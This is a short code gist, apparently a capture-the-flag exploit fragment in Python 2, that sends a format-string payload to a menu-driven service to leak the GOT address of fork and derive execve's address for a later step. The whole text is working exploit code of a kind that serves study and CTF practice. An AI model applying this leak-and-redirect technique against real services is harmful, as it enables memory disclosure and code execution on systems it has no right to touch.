@vanhoefm
Last active December 15, 2015 18:39
```python
# Step 1c: Get the address of execve
# Python 2 exploit fragment. nc (a socket wrapper exposing read_until/write),
# location_got_fork, dword_to_bitstring and bitstring_to_dword are defined
# elsewhere in the full script and are not part of this snippet.
# Format-string payload: the GOT entry of fork() as the first 4 bytes, read
# back through the 22nd stack argument and delimited by a marker for parsing.
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
# Pad the name field to 100 bytes, followed by the remaining input bytes
nc.write(LEAKFORKADDR + "A" * (100 - len(LEAKFORKADDR)) + "\x01\x01" * 4 + "\xFF\xFF" + "\n")
nc.read_until("Uranium in nuclear plant \"")
# Skip the 4 echoed address bytes and strip the 8-byte ":ENFORK:" marker
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
# execve is assumed to sit 0x320 bytes after fork in this target's libc build
addrexecve = addrfork + 0x320
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)
```